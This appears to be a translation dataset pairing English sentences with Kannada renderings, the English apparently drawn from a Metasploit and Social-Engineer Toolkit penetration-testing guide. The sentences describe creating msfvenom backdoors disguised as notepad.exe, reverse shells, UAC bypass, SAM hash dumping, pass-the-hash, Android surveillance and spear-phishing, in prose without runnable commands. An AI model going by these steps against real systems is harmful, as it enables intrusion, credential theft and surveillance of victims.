| {"en":"Then, we will set up our listener, using the Generic Payload Handler module so that the next time the user logs in to the machine, we will get a new session using our WMI backdoor:","translation":"ನಂತರ, ನಾವು ನಮ್ಮ ಕೇಳುಗರನ್ನು ಸ್ಥಾಪಿಸುತ್ತೇವೆ, ಜೆನೆರಿಕ್ ಪೇಲೋಡ್ ಹ್ಯಾಂಡ್ಲರ್ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಬಳಸುತ್ತೇವೆ ಆದ್ದರಿಂದ ಮುಂದಿನ ಬಾರಿ ಬಳಕೆದಾರರು ಯಂತ್ರಕ್ಕೆ ಲಾಗ್ ಇನ್ ಆದಾಗ, ನಮ್ಮ WMI ಬ್ಯಾಕ್ಡೋರ್ ಬಳಸಿ ನಾವು ಹೊಸ ಸೆಷನ್ ಅನ್ನು ಪಡೆಯುತ್ತೇವೆ:","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"By logging off and logging in as the administrator user on the target machine, we were able to verify that the backdoor works as expected.","translation":"ಗುರಿ ಯಂತ್ರದಲ್ಲಿ ನಿರ್ವಾಹಕ ಬಳಕೆದಾರರಾಗಿ ಲಾಗ್ ಆಫ್ ಮಾಡುವ ಮೂಲಕ ಮತ್ತು ಲಾಗ್ ಇನ್ ಮಾಡುವ ಮೂಲಕ, ಬ್ಯಾಕ್ಡೋರ್ ನಿರೀಕ್ಷಿಸಿದಂತೆ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ ಎಂದು ನಾವು ಪರಿಶೀಲಿಸಲು ಸಾಧ್ಯವಾಯಿತು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"A Denial of Service (DoS) attack denies legitimate users access to computer services (or resources), usually by overloading the service with requests or by exploiting vulnerabilities, resulting in a degradation of performance, and possibly crashing the service or even the operating system.","translation":"ಸೇವಾ ನಿರಾಕರಣೆ (DoS) ದಾಳಿಯು ಕಾನೂನುಬದ್ಧ ಬಳಕೆದಾರರಿಗೆ ಕಂಪ್ಯೂಟರ್ ಸೇವೆಗಳು (ಅಥವಾ ಸಂಪನ್ಮೂಲಗಳು) ಪ್ರವೇಶವನ್ನು ನಿರಾಕರಿಸುತ್ತದೆ, ಸಾಮಾನ್ಯವಾಗಿ ಸೇವೆಯನ್ನು ವಿನಂತಿಗಳೊಂದಿಗೆ ಓವರ್ಲೋಡ್ ಮಾಡುವ ಮೂಲಕ ಅಥವಾ ದೌರ್ಬಲ್ಯಗಳನ್ನು ಬಳಸಿಕೊಳ್ಳುವ ಮೂಲಕ, ಇದು ಕಾರ್ಯಕ್ಷಮತೆಯ ಅವನತಿಗೆ ಕಾರಣವಾಗುತ್ತದೆ ಮತ್ತು ಸೇವೆಯನ್ನು ಅಥವಾ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ ಅನ್ನು ಸಹ ಕ್ರ್ಯಾಶ್ ಮಾಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Before using the SMBLoris NBSS Denial of Service auxiliary DoS module, we need to use the ulimit command to set the maximum number of open file descriptors to 65535, so we can handle simultaneous connections:","translation":"SMBLoris NBSS ಸೇವಾ ನಿರಾಕರಣೆ ಸಹಾಯಕ DoS ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಬಳಸುವ ಮೊದಲು, ನಾವು ತೆರೆದ ಫೈಲ್ ವಿವರಣೆಗಳ ಗರಿಷ್ಠ ಸಂಖ್ಯೆಯನ್ನು 65535 ಗೆ ಹೊಂದಿಸಲು ulimit ಆಜ್ಞೆಯನ್ನು ಬಳಸಬೇಕಾಗುತ್ತದೆ, ಆದ್ದರಿಂದ ನಾವು ಏಕಕಾಲಿಕ ಸಂಪರ್ಕಗಳನ್ನು ನಿರ್ವಹಿಸಬಹುದು:","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"We can launch msfconsole with the -q option, so it does not print the banner on startup.","translation":"ನಾವು msfconsole ಅನ್ನು -q ಆಯ್ಕೆಯೊಂದಿಗೆ ಪ್ರಾರಂಭಿಸಬಹುದು, ಆದ್ದರಿಂದ ಅದು ಪ್ರಾರಂಭದಲ್ಲಿ ಬ್ಯಾನರ್ ಅನ್ನು ಮುದ್ರಿಸುವುದಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Looking at the target machine, we can see the attack consumes large chunks of memory in the target by sending SMB requests with the NetBIOS Session Service (NBSS) length header value set to the maximum possible value, which initiates a large numbers of sessions, and the memory does not get freed, halting the target machine:","translation":"ಗುರಿ ಯಂತ್ರವನ್ನು ನೋಡುವಾಗ, ನೆಟ್ಬಯೋಸ್ ಸೆಷನ್ ಸೇವೆ (NBSS) ಉದ್ದದ ಹೆಡರ್ ಮೌಲ್ಯದೊಂದಿಗೆ SMB ವಿನಂತಿಗಳನ್ನು ಕಳುಹಿಸುವ ಮೂಲಕ ದಾಳಿಯು ಗುರಿಯಲ್ಲಿ ದೊಡ್ಡ ಪ್ರಮಾಣದ ಮೆಮೊರಿಯನ್ನು ಬಳಸುತ್ತದೆ ಎಂದು ನಾವು ನೋಡಬಹುದು, ಇದು ಗರಿಷ್ಠ ಸಾಧ್ಯವಿರುವ ಮೌಲ್ಯಕ್ಕೆ ಹೊಂದಿಸಲಾಗಿದೆ, ಇದು ದೊಡ್ಡ ಸಂಖ್ಯೆಯ ಸೆಷನ್ಗಳನ್ನು ಪ್ರಾರಂಭಿಸುತ್ತದೆ ಮತ್ತು ಮೆಮೊರಿಯನ್ನು ಮುಕ್ತಗೊಳಿಸಲಾಗುವುದಿಲ್ಲ, ಗುರಿ ಯಂತ್ರವನ್ನು ನಿಲ್ಲಿಸುತ್ತದೆ:","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"The attacker used msfvenom to create a backdoor using notepad.exe.","translation":"ಆಕ್ರಮಣಕಾರನು ನೋಟ್ಪ್ಯಾಡ್.ಎಕ್ಸಿ ಫೈಲ್ ಬಳಸಿ ಬ್ಯಾಕ್ಡೋರ್ ರಚಿಸಲು msfvenom ಅನ್ನು ಬಳಸಿದನು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The LHOST parameter specifies the attacker's IP address.","translation":"LHOST ಪ್ಯಾರಾಮೀಟರ್ ದಾಳಿಕೋರನ IP ವಿಳಾಸವನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"The -x option is used to specify a custom executable file.","translation":"-x ಆಯ್ಕೆಯು ಕಸ್ಟಮ್ ಎಕ್ಸಿಕ್ಯೂಟಬಲ್ ಫೈಲ್ ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಲು ಬಳಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"The -k option preserves the template behavior.","translation":"-k ಆಯ್ಕೆಯು ಟೆಂಪ್ಲೇಟ್ ನಡವಳಿಕೆಯನ್ನು ಸಂರಕ್ಷಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"The output format is specified using the -f option.","translation":"-f ಆಯ್ಕೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಔಟ್ಪುಟ್ ಫಾರ್ಮ್ಯಾಟ್ ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಲಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Null bytes are avoided using the -b option.","translation":"-b ಆಯ್ಕೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಶೂನ್ಯ ಬೈಟ್ಗಳನ್ನು ತಪ್ಪಿಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"The output file name is set with the -o option.","translation":"-o ಆಯ್ಕೆಯೊಂದಿಗೆ ಔಟ್ಪುಟ್ ಫೈಲ್ ಹೆಸರನ್ನು ಹೊಂದಿಸಲಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"After creating the backdoor, it was uploaded to the target.","translation":"ಬ್ಯಾಕ್ಡೋರ್ ರಚಿಸಿದ ನಂತರ, ಅದನ್ನು ಗುರಿಗೆ ಅಪ್ಲೋಡ್ ಮಾಡಲಾಯಿತು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The backdoor was then renamed to notepad.exe.","translation":"ನಂತರ ಬ್ಯಾಕ್ಡೋರ್ ಅನ್ನು ನೋಟ್ಪ್ಯಾಡ್.ಎಕ್ಸಿ ಎಂದು ಮರುಹೆಸರಿಸಲಾಯಿತು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"A listener was started to receive the Meterpreter session.","translation":"ಮೀಟರ್ಪ್ರಿಟರ್ ಸೆಷನ್ ಸ್ವೀಕರಿಸಲು ಒಂದು ಲಿಸನರ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಲಾಯಿತು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The reverse TCP handler was configured to listen on a specific IP and port.","translation":"ರಿವರ್ಸ್ TCP ಹ್ಯಾಂಡ್ಲರ್ ಅನ್ನು ನಿರ್ದಿಷ್ಟ IP ಮತ್ತು ಪೋರ್ಟ್ನಲ್ಲಿ ಕೇಳಲು ಕಾನ್ಫಿಗರ್ ಮಾಡಲಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Starting notepad.exe on the target machine triggered the backdoor.","translation":"ಗುರಿ ಯಂತ್ರದಲ್ಲಿ ನೋಟ್ಪ್ಯಾಡ್.ಎಕ್ಸಿ ಪ್ರಾರಂಭಿಸುವುದರಿಂದ ಬ್ಯಾಕ್ಡೋರ್ ಪ್ರಚೋದಿಸಲ್ಪಟ್ಟಿತು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The attacker gained a new Meterpreter session.","translation":"ಆಕ್ರಮಣಕಾರನು ಹೊಸ ಮೀಟರ್ಪ್ರಿಟರ್ ಸೆಷನ್ ಪಡೆದನು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Pivoting allows access to other systems on the network.","translation":"ಪಿವೋಟಿಂಗ್ ನೆಟ್ವರ್ಕ್ನಲ್ಲಿ ಇತರ ಸಿಸ್ಟಮ್ಗಳಿಗೆ ಪ್ರವೇಶವನ್ನು ಅನುಮತಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The compromised server can be used to attack the internal network.","translation":"ಸಂಯೋಜಿತ ಸರ್ವರ್ ಅನ್ನು ಆಂತರಿಕ ನೆಟ್ವರ್ಕ್ ಮೇಲೆ ದಾಳಿ ಮಾಡಲು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The Windows 10 firewall was disabled for the attack.","translation":"ದಾಳಿಗಾಗಿ ವಿಂಡೋಸ್ 10 ಫೈರ್ವಾಲ್ ಅನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಲಾಯಿತು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"A registry key was added to allow code execution.","translation":"ಕೋಡ್ ಎಕ್ಸಿಕ್ಯೂಷನ್ ಅನ್ನು ಅನುಮತಿಸಲು ಒಂದು ರಿಜಿಸ್ಟ್ರಿ ಕೀಲಿಯನ್ನು ಸೇರಿಸಲಾಯಿತು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The Samba usermap script exploit was used to target a Linux server.","translation":"ಲಿನಕ್ಸ್ ಸರ್ವರ್ ಅನ್ನು ಗುರಿಯಾಗಿಸಲು ಸಾಂಬಾ ಯೂಸರ್ಮ್ಯಾಪ್ ಸ್ಕ್ರಿಪ್ಟ್ ಎಕ್ಸ್ಪ್ಲೋಯಿಟ್ ಅನ್ನು ಬಳಸಲಾಯಿತು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"The shell was upgraded to a Meterpreter session.","translation":"ಶೆಲ್ ಅನ್ನು ಮೀಟರ್ಪ್ರಿಟರ್ ಸೆಷನ್ಗೆ ಅಪ್ಗ್ರೇಡ್ ಮಾಡಲಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The ifconfig command was used to view network interfaces.","translation":"ನೆಟ್ವರ್ಕ್ ಇಂಟರ್ಫೇಸ್ಗಳನ್ನು ವೀಕ್ಷಿಸಲು ifconfig ಆಜ್ಞೆಯನ್ನು ಬಳಸಲಾಯಿತು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"This command is used to migrate from one process context to another.","translation":"ಈ ಆಜ್ಞೆಯನ್ನು ಒಂದು ಪ್ರಕ್ರಿಯೆಯ ಸಂದರ್ಭದಿಂದ ಇನ್ನೊಂದಕ್ಕೆ ವಲಸೆ ಹೋಗಲು ಬಳಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"We can migrate to any other active process by using the process name or the ID.","translation":"ಪ್ರಕ್ರಿಯೆಯ ಹೆಸರನ್ನು ಅಥವಾ ID ಅನ್ನು ಬಳಸಿಕೊಂಡು ನಾವು ಯಾವುದೇ ಇತರ ಸಕ್ರಿಯ ಪ್ರಕ್ರಿಯೆಗೆ ವಲಸೆ ಹೋಗಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The ps command can be used to identify all active processes along with their names and IDs.","translation":"ps ಆಜ್ಞೆಯನ್ನು ಎಲ್ಲಾ ಸಕ್ರಿಯ ಪ್ರಕ್ರಿಯೆಗಳನ್ನು ಅವುಗಳ ಹೆಸರುಗಳು ಮತ್ತು ID ಗಳೊಂದಿಗೆ ಗುರುತಿಸಲು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"So, migrating to a stable system process can help us perform our penetration testing smoothly.","translation":"ಆದ್ದರಿಂದ, ಸ್ಥಿರ ಸಿಸ್ಟಮ್ ಪ್ರಕ್ರಿಯೆಗೆ ವಲಸೆ ಹೋಗುವುದು ನಮ್ಮ ನುಗ್ಗುವ ಪರೀಕ್ಷೆಯನ್ನು ಸುಗಮವಾಗಿ ನಿರ್ವಹಿಸಲು ಸಹಾಯ ಮಾಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"These two Meterpreter commands are very handy and are used frequently during penetration testing.","translation":"ಈ ಎರಡು ಮೀಟರ್ಪ್ರಿಟರ್ ಆಜ್ಞೆಗಳು ತುಂಬಾ ಉಪಯುಕ್ತವಾಗಿವೆ ಮತ್ತು ನುಗ್ಗುವ ಪರೀಕ್ಷೆಯ ಸಮಯದಲ್ಲಿ ಆಗಾಗ್ಗೆ ಬಳಸಲ್ಪಡುತ್ತವೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Although still used, UAC is inherently broken and can be trivially defeated.","translation":"ಇನ್ನೂ ಬಳಸಲಾಗಿದ್ದರೂ, UAC ಅಂತರ್ಗತವಾಗಿ ಮುರಿದುಹೋಗಿದೆ ಮತ್ತು ಅದನ್ನು ಸುಲಭವಾಗಿ ಸೋಲಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"For this recipe, we will target the Windows 7 machine.","translation":"ಈ ಪಾಕವಿಧಾನಕ್ಕಾಗಿ, ನಾವು ವಿಂಡೋಸ್ 7 ಯಂತ್ರವನ್ನು ಗುರಿಯಾಗಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"To generate the backdoor, we will use a Windows Meterpreter reverse TCP payload.","translation":"ಬ್ಯಾಕ್ಡೋರ್ ಅನ್ನು ರಚಿಸಲು, ನಾವು ವಿಂಡೋಸ್ ಮೀಟರ್ಪ್ರಿಟರ್ ರಿವರ್ಸ್ TCP ಪೇಲೋಡ್ ಅನ್ನು ಬಳಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"After setting the listening address with the LHOST option and looking at the available options for the generate command, we will use the -t option for the output format.","translation":"LHOST ಆಯ್ಕೆಯೊಂದಿಗೆ ಆಲಿಸುವ ವಿಳಾಸವನ್ನು ಹೊಂದಿಸಿದ ನಂತರ ಮತ್ತು ಉತ್ಪಾದನಾ ಆಜ್ಞೆಗಾಗಿ ಲಭ್ಯವಿರುವ ಆಯ್ಕೆಗಳನ್ನು ನೋಡಿದ ನಂತರ, ನಾವು ಔಟ್ಪುಟ್ ಫಾರ್ಮ್ಯಾಟ್ಗಾಗಿ -t ಆಯ್ಕೆಯನ್ನು ಬಳಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Now that we have created the backdoor, we need to set up a listener to receive the reverse shell.","translation":"ನಾವು ಬ್ಯಾಕ್ಡೋರ್ ಅನ್ನು ರಚಿಸಿದ ನಂತರ, ರಿವರ್ಸ್ ಶೆಲ್ ಅನ್ನು ಸ್ವೀಕರಿಸಲು ನಾವು ಕೇಳುಗರನ್ನು ಸ್ಥಾಪಿಸಬೇಕಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"By starting the listener with run -j, it will run it in the context of a job, allowing us to continue using the msfconsole.","translation":"ರನ್ -j ನೊಂದಿಗೆ ಕೇಳುಗರನ್ನು ಪ್ರಾರಂಭಿಸುವ ಮೂಲಕ, ಅದು ಕೆಲಸದ ಸಂದರ್ಭದಲ್ಲಿ ಚಲಿಸುತ್ತದೆ, ಇದು msfconsole ಅನ್ನು ಬಳಸುವುದನ್ನು ಮುಂದುವರಿಸಲು ನಮಗೆ ಅನುಮತಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"To copy the backdoor to the target, we can use the FTP File Server auxiliary module.","translation":"ಬ್ಯಾಕ್ಡೋರ್ ಅನ್ನು ಗುರಿಗೆ ನಕಲಿಸಲು, ನಾವು FTP ಫೈಲ್ ಸರ್ವರ್ ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"If everything went well, we should have a new Meterpreter session on the target machine.","translation":"ಎಲ್ಲವೂ ಸರಿಯಾಗಿ ನಡೆದರೆ, ನಾವು ಗುರಿ ಯಂತ್ರದಲ್ಲಿ ಹೊಸ ಮೀಟರ್ಪ್ರಿಟರ್ ಅವಧಿಯನ್ನು ಹೊಂದಿರಬೇಕು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Now that we have a session on the target machine, one of the first things we want is to try to elevate our privileges.","translation":"ನಾವು ಗುರಿ ಯಂತ್ರದಲ್ಲಿ ಅವಧಿಯನ್ನು ಹೊಂದಿರುವಾಗ, ನಾವು ಬಯಸುವ ಮೊದಲ ವಿಷಯವೆಂದರೆ ನಮ್ಮ ಸವಲತ್ತುಗಳನ್ನು ಹೆಚ್ಚಿಸಲು ಪ್ರಯತ್ನಿಸುವುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"However, privilege escalation using the getsystem command fails because of UAC.","translation":"ಆದಾಗ್ಯೂ, getsystem ಆಜ್ಞೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಸವಲತ್ತು ಹೆಚ್ಚಳವು UAC ಕಾರಣದಿಂದಾಗಿ ವಿಫಲಗೊಳ್ಳುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"As you can see, bypassing UAC is easy, which is why you should not rely on UAC as a security mechanism.","translation":"ನೀವು ನೋಡುವಂತೆ, UAC ಅನ್ನು ಬೈಪಾಸ್ ಮಾಡುವುದು ಸುಲಭ, ಅದಕ್ಕಾಗಿಯೇ ನೀವು ಭದ್ರತಾ ಕಾರ್ಯವಿಧಾನವಾಗಿ UAC ಅನ್ನು ಅವಲಂಬಿಸಬಾರದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Security Accounts Manager (SAM) is a database in the Windows operating system that contains usernames and passwords.","translation":"ಭದ್ರತಾ ಖಾತೆಗಳ ವ್ಯವಸ್ಥಾಪಕ (SAM) ವಿಂಡೋಸ್ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ನಲ್ಲಿರುವ ಡೇಟಾಬೇಸ್ ಆಗಿದ್ದು, ಇದು ಬಳಕೆದಾರಹೆಸರುಗಳು ಮತ್ತು ಪಾಸ್ವರ್ಡ್ಗಳನ್ನು ಒಳಗೊಂಡಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"First, we will start with the classic Meterpreter hashdump command.","translation":"ಮೊದಲಿಗೆ, ನಾವು ಕ್ಲಾಸಿಕ್ ಮೀಟರ್ಪ್ರಿಟರ್ ಹ್ಯಾಶ್ಡಂಪ್ ಆಜ್ಞೆಯೊಂದಿಗೆ ಪ್ರಾರಂಭಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"The post-exploitation module will dump the local accounts from the SAM database.","translation":"ಪೋಸ್ಟ್-ಶೋಷಣೆ ಮಾಡ್ಯೂಲ್ SAM ಡೇಟಾಬೇಸ್ನಿಂದ ಸ್ಥಳೀಯ ಖಾತೆಗಳನ್ನು ಡಂಪ್ ಮಾಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The pass the hash technique allows us to authenticate to a remote server or service by passing the hashed credentials directly without cracking them.","translation":"ಪಾಸ್ ದಿ ಹ್ಯಾಶ್ ತಂತ್ರವು ಕ್ರ್ಯಾಕ್ ಮಾಡದೆಯೇ ನೇರವಾಗಿ ಹ್ಯಾಶ್ ಮಾಡಿದ ರುಜುವಾತುಗಳನ್ನು ರವಾನಿಸುವ ಮೂಲಕ ರಿಮೋಟ್ ಸರ್ವರ್ ಅಥವಾ ಸೇವೆಗೆ ದೃಢೀಕರಿಸಲು ನಮಗೆ ಅನುಮತಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"After allowing unknown sources, you can install the backdoor.","translation":"ತಿಳಿಯದ ಮೂಲಗಳನ್ನು ಅನುಮತಿಸಿದ ನಂತರ, ನೀವು ಬ್ಯಾಕ್ಡೋರ್ ಅನ್ನು ಸ್ಥಾಪಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Meterpreter session 1 opened.","translation":"ಮೀಟರ್ಪ್ರಿಟರ್ ಸೆಷನ್ 1 ತೆರೆಯಲಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Besides all the regular meterpreter commands, using the Android payload we get a couple of specific commands.","translation":"ಎಲ್ಲಾ ಸಾಮಾನ್ಯ ಮೀಟರ್ಪ್ರಿಟರ್ ಆಜ್ಞೆಗಳ ಜೊತೆಗೆ, Android ಪೇಲೋಡ್ ಅನ್ನು ಬಳಸುವುದರಿಂದ ನಾವು ಕೆಲವು ನಿರ್ದಿಷ್ಟ ಆಜ್ಞೆಗಳನ್ನು ಪಡೆಯುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"We can now get the call logs, read and send SMS messages, and get the location of the device.","translation":"ನಾವು ಈಗ ಕರೆ ಲಾಗ್ಗಳನ್ನು ಪಡೆಯಬಹುದು, SMS ಸಂದೇಶಗಳನ್ನು ಓದಬಹುದು ಮತ್ತು ಕಳುಹಿಸಬಹುದು ಮತ್ತು ಸಾಧನದ ಸ್ಥಳವನ್ನು ಪಡೆಯಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"There's more... Metasploit is not restricted to Android devices.","translation":"ಇನ್ನೂ ಇದೆ... ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ Android ಸಾಧನಗಳಿಗೆ ಸೀಮಿತವಾಗಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"If you have a jailbroken arm64 iOS device, you can also create a backdoor with msfvenom.","translation":"ನೀವು ಜೈಲ್ಬ್ರೋಕನ್ arm64 iOS ಸಾಧನವನ್ನು ಹೊಂದಿದ್ದರೆ, ನೀವು msfvenom ನೊಂದಿಗೆ ಬ್ಯಾಕ್ಡೋರ್ ಅನ್ನು ಸಹ ರಚಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The Social-Engineer Toolkit (SET) is an open source penetration testing framework.","translation":"ಸೋಷಿಯಲ್-ಇಂಜಿನಿಯರ್ ಟೂಲ್ಕಿಟ್ (SET) ಒಂದು ಮುಕ್ತ ಮೂಲ ನುಗ್ಗುವಿಕೆ ಪರೀಕ್ಷಾ ಚೌಕಟ್ಟಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"SET can be installed on Linux and macOS.","translation":"SET ಅನ್ನು Linux ಮತ್ತು macOS ನಲ್ಲಿ ಸ್ಥಾಪಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"SET is a Python-based automation tool that creates a menu-driven application.","translation":"SET ಒಂದು ಪೈಥಾನ್-ಆಧಾರಿತ ಆಟೋಮೇಷನ್ ಟೂಲ್ ಆಗಿದ್ದು, ಇದು ಮೆನು-ಚಾಲಿತ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ರಚಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"A spear-phishing attack vector is an email attack scenario.","translation":"ಸ್ಪಿಯರ್-ಫಿಶಿಂಗ್ ದಾಳಿ ವೆಕ್ಟರ್ ಇಮೇಲ್ ದಾಳಿ ಸನ್ನಿವೇಶವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"In order to spoof your own email address, you will require a sendmail server.","translation":"ನಿಮ್ಮ ಸ್ವಂತ ಇಮೇಲ್ ವಿಳಾಸವನ್ನು ಸ್ಪೂಫ್ ಮಾಡಲು, ನಿಮಗೆ ಸೆಂಡ್ಮೇಲ್ ಸರ್ವರ್ ಅಗತ್ಯವಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The spear-phishing module has three different attack vectors.","translation":"ಸ್ಪಿಯರ್-ಫಿಶಿಂಗ್ ಮಾಡ್ಯೂಲ್ ಮೂರು ವಿಭಿನ್ನ ದಾಳಿ ವೆಕ್ಟರ್ಗಳನ್ನು ಹೊಂದಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Passing the first option will start the mass email attack.","translation":"ಮೊದಲ ಆಯ್ಕೆಯನ್ನು ರವಾನಿಸುವುದರಿಂದ ಸಾಮೂಹಿಕ ಇಮೇಲ್ ದಾಳಿ ಪ್ರಾರಂಭವಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Then, we will be prompted to select a payload and specify the IP address or URL.","translation":"ನಂತರ, ಪೇಲೋಡ್ ಅನ್ನು ಆಯ್ಕೆ ಮಾಡಲು ಮತ್ತು IP ವಿಳಾಸ ಅಥವಾ URL ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಲು ನಮ್ಮನ್ನು ಕೇಳಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The SET web attack vector is a unique way of utilizing multiple web-based attacks.","translation":"SET ವೆಬ್ ದಾಳಿ ವೆಕ್ಟರ್ ಬಹು ವೆಬ್-ಆಧಾರಿತ ದಾಳಿಗಳನ್ನು ಬಳಸಿಕೊಳ್ಳುವ ಒಂದು ವಿಶಿಷ್ಟ ಮಾರ್ಗವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"After selecting the HTA Attack Method in SET, we can clone a site.","translation":"SET ನಲ್ಲಿ HTA ದಾಳಿ ವಿಧಾನವನ್ನು ಆಯ್ಕೆ ಮಾಡಿದ ನಂತರ, ನಾವು ಸೈಟ್ ಅನ್ನು ಕ್ಲೋನ್ ಮಾಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The multi-attack web method takes web attacks to the next level.","translation":"ಬಹು-ದಾಳಿ ವೆಬ್ ವಿಧಾನವು ವೆಬ್ ದಾಳಿಗಳನ್ನು ಮುಂದಿನ ಹಂತಕ್ಕೆ ಕೊಂಡೊಯ್ಯುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"SET automates the process of clubbing different attacks under a single web attack scenario.","translation":"SET ಒಂದು ವೆಬ್ ದಾಳಿ ಸನ್ನಿವೇಶದ ಅಡಿಯಲ್ಲಿ ವಿವಿಧ ದಾಳಿಗಳನ್ನು ಕ್ಲಬ್ ಮಾಡುವ ಪ್ರಕ್ರಿಯೆಯನ್ನು ಸ್ವಯಂಚಾಲಿತಗೊಳಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"The infectious media generator is a relatively simple attack vector.","translation":"ಸಾಂಕ್ರಾಮಿಕ ಮಾಧ್ಯಮ ಜನರೇಟರ್ ತುಲನಾತ್ಮಕವಾಗಿ ಸರಳವಾದ ದಾಳಿ ವೆಕ್ಟರ್ ಆಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
